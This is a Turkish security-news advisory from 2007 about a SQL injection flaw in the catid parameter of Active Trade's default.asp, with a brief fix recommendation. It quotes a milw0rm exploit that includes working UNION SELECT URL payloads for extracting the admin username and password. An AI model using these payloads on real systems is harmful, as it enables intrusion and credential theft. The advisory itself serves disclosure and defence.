|
|
Active Trade catid SQL Injection açığı
|
|
|
Ana sayfa
Haberler
Güvenlik Açıkları
|
|
|
Yazar: Ertan Kurt
|
Yayınlanma tarihi: 26.03.2007 11:14
|
Kod Güvenliği
|
CyberGhost tarafından rapor edilen açık SQL sorgu ekleme saldırılarına izin veriyor.
|
default.asp dosyasında catid parametresine eklenen girişler doğru olarak kontrol edilmiyor. Bu sayede SQL sorgularında değişiklik yaparak istenilen SQL kodunu çalıştırmak mümkün olabiliyor.
Açığın 2 sürümünde olduğu rapor edildi fakat diğer sürümler de etkileniyor olabilir.
Çözüm:
Kaynak kodunda düzenleme yaparak doğru filtrelemenin yapıldığına emin olun.
Ref:
#Title : Active Trade Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivetrade
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32
#Vuln.
#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1
#Admin Login : /admin.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !
# milw0rm.com [2007-03-23]
|
|
|
|
